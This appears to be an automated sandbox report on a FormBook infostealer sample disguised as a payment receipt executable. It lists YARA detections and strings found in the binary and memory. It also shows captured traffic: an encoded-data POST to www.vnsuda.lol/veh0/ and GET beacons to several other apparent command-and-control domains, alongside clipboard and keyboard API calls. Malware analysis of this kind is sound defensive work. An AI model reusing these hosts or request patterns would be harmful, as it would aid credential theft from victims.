          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 15:44:05 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: payment_copy2_receipt.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: payment_copy2_receipt.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: n5335GITL.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/fP
          Source: n5335GITL.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: n5335GITL.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: n5335GITL.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: msdt.exe, 0000000C.00000002.514187588.000000000553A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV
          Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
          Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.vnsuda.lolConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.vnsuda.lolUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vnsuda.lol/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 4b 32 42 42 6a 5a 7a 71 4b 58 57 37 35 67 6e 36 64 57 51 6c 39 6a 32 4e 47 6b 69 45 36 63 5a 30 37 62 67 68 75 70 7e 58 75 58 6d 74 4f 46 75 5f 68 4b 63 32 75 74 38 49 53 62 49 52 53 57 33 32 4e 4f 77 45 79 31 63 4e 62 44 31 39 49 43 30 52 58 72 68 49 51 47 6e 74 6d 62 56 4d 55 2d 61 77 28 78 78 39 76 44 4e 31 55 6b 33 77 4c 67 55 61 31 75 4f 38 49 63 7e 5a 36 74 6e 46 28 6f 4f 71 42 4e 78 6c 69 61 51 72 37 72 7a 66 78 49 52 66 46 5a 4a 77 64 4b 37 67 70 52 6b 74 4b 4b 61 71 56 2d 70 7a 6f 32 74 4d 45 77 7a 64 28 37 34 41 48 76 50 48 79 6f 45 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=K2BBjZzqKXW75gn6dWQl9j2NGkiE6cZ07bghup~XuXmtOFu_hKc2ut8ISbIRSW32NOwEy1cNbD19IC0RXrhIQGntmbVMU-aw(xx9vDN1Uk3wLgUa1uO8Ic~Z6tnF(oOqBNxliaQr7rzfxIRfFZJwdK7gpRktKKaqV-pzo2tMEwzd(74AHvPHyoE.
          Source: unknownDNS traffic detected: queries for: www.030332.com
          Source: global trafficHTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT HTTP/1.1Host: www.030332.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.vnsuda.lolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM HTTP/1.1Host: www.coolfashionshop.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.stephapproved.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v HTTP/1.1Host: www.bem4u.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,
          Source: payment_copy2_receipt.exe, 00000000.00000002.259418578.00000000006DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_00404020 GetKeyboardState,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: fcvvthv.exe PID: 2828, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: msdt.exe PID: 5440, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: payment_copy2_receipt.exe
          Source: payment_copy2_receipt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: fcvvthv.exe PID: 2828, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: msdt.exe PID: 5440, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
